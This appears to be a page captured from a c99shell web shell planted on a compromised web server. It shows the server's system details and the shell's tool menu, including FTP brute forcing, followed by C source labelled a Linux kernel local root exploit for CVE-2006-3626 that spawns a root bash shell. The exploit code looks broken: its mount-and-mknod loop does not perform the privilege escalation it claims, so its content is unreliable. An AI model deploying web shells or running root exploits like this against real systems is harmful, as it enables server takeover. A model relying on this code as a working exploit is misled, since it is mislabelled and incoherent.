mina-info.me - c99shell

!C99Shell v. 1.0 pre-release build #16!
Software: Apache/2.0.54 (Fedora). PHP/5.0.4 uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t Safe-mode: OFF (not secure) /var/tmp/ drwxrwxrwt Free 3.41 GB of 27.03 GB (12.62%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t

Safe-mode: OFF (not secure)

/var/tmp/ drwxrwxrwt
Free 3.41 GB of 27.03 GB (12.62%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <fcntl.h>

#include <sys/mount.h>

#include <sys/mman.h>

#include <string.h>



#define FILENAME "/var/tmp/h0lysh1t"

#define PAYLOAD "/bin/bash"



void drop_shell() {

    printf("[+] GOT ROOT. Starting shell...\n");

    setuid(0);

    setgid(0);

    execl(PAYLOAD, PAYLOAD, NULL);

    perror("execl failed");

    exit(0);

}



int main(int argc, char **argv) {

    int fd, pid;

    char *p;



    printf("Linux Kernel 2.6.17-1.2142_FC4smp Local Root\n");

    printf("CVE-2006-3626 (Modified for direct root shell)\n");



    umount(FILENAME);

    mknod(FILENAME, 0644|S_IFREG, 0);



    fd = open(FILENAME, O_WRONLY | O_TRUNC);

    if (fd < 0) {

        perror("open failed");

        return 1;

    }



    p = (char *)mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    if (p == MAP_FAILED) {

        perror("mmap failed");

        close(fd);

        return 1;

    }



    strcpy(p, "h0lysh1t");



    if (write(fd, p, 8) != 8) {

        perror("write failed");

        close(fd);

        return 1;

    }

    close(fd);



    if (mount("h0lysh1t", FILENAME, "tmpfs", 0, "size=0") < 0) {

        perror("mount failed");

        return 1;

    }



    pid = fork();

    if (pid == 0) {

        for (;;) {

            if (open(FILENAME, O_RDONLY) < 0)

                continue;

            else {

                drop_shell();

            }

        }

    } else if (pid > 0) {

        for (;;) {

            if (mount("h0lysh1t", FILENAME, "tmpfs", MS_MGC_VAL | MS_REMOUNT, "size=0") < 0)

                continue;

            else {

                if (umount(FILENAME) == 0)

                    mknod(FILENAME, 0644|S_IFREG, 0);

            }

        }

    } else {

        perror("fork failed");

        return 1;

    }



    return 0;

}

:: Command execute ::
Enter:	Select: